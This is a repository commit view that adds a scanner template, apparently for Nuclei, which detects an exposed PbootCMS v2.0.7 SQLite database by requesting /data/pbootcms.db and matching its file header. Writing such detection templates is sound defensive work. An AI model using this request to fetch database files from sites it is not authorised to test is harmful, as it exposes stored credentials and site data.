Merge pull request #4073 from ritikchaddha/patch-16
Create pbootcms-database-file-download.yamlpatch-1
commit
84b9e66fba
|
@ -0,0 +1,29 @@
|
|||
id: pbootcms-database-file-download
|
||||
|
||||
info:
|
||||
name: PbootCMS v2.0.7 DB File Download
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
reference:
|
||||
- https://xz.aliyun.com/t/7628
|
||||
- https://www.cnblogs.com/0daybug/p/12786036.html
|
||||
tags: pbootcms,db,exposure,database,sqlite
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/data/pbootcms.db"
|
||||
|
||||
max-size: 20000
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "PbootCMS"
|
||||
- "SQLite format 3"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue